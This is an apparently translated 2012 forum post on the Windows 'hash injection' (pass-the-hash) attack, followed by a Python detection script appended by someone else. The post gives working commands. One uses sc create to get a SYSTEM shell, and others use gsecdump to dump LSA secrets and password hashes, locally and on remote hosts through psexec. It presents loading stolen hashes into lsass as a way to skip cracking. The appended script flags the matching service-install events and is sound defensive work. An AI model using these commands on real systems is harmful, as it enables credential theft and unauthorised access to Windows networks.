
Hash injection attack

Original poster, posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which is how the hash injection attack is carried out. The foreigners really are good at this; admins will have their hands full now. The LM/NT hashes obtained during ARP spoofing, or with gethash, don't actually need to be cracked at all; it is just a matter of using the tools. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
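An added detection example, not part of the original post or the quoted blog: it runs over constructed Service Control Manager event records shaped after the sc create / sc start / psexec steps quoted above and flags the service installs a defender would alert on. Event IDs 7045 (service installed) and 7000 (service failed to start) are real System-log events; the record layout, field names and sample values here are constructed.

```python
import re

# Constructed sample records shaped like System-log events from the Service Control
# Manager (7045 = a service was installed, 7000 = a service failed to start). The first
# three mirror the sc create / sc start / psexec steps quoted in the post.
SAMPLE_EVENTS = [
    {"id": 7045, "service": "shellcmdline", "account": "LocalSystem",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start"},
    {"id": 7000, "service": "shellcmdline",
     "message": "The service did not respond to the start or control request in a timely fashion."},
    {"id": 7045, "service": "PSEXESVC", "account": "LocalSystem", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "service": "Spooler", "account": "LocalSystem", "image": r"%SystemRoot%\System32\spoolsv.exe"},
]

# Command interpreters have no business being the binary path of a service.
SHELL_IMAGE = re.compile(r"(?:^|\\)(cmd|powershell|wscript|cscript)\.exe\b", re.IGNORECASE)
PSEXEC = re.compile(r"psexesvc", re.IGNORECASE)


def find_suspicious_services(events):
    """Return {service_name: [reasons]} for SCM events matching the post's tradecraft."""
    findings = {}
    for ev in events:
        name, image = ev["service"], ev.get("image", "")
        if ev["id"] == 7045:
            if SHELL_IMAGE.search(image):
                findings.setdefault(name, []).append(
                    f"7045: command interpreter installed as a service ({image}) as {ev.get('account')}")
            if PSEXEC.search(name) or PSEXEC.search(image):
                findings.setdefault(name, []).append(
                    "7045: PsExec service binary installed (remote command execution on this host)")
        elif ev["id"] == 7000 and name in findings and "did not respond" in ev.get("message", ""):
            # The timeout (error 1053) right after an interpreter was installed as a service is the
            # same sequence the post's own output shows; the two events together are a strong signal.
            findings[name].append("7000: start timed out after an interpreter was installed as a service")
    return findings


if __name__ == "__main__":
    for svc, reasons in find_suspicious_services(SAMPLE_EVENTS).items():
        print(svc)
        for reason in reasons:
            print("  -", reason)
```

Pairing the 7045 record with a 7036/7045 delete shortly afterwards, as in the post's sc delete step, narrows the alert further; the Spooler record shows a legitimate install passing through untouched.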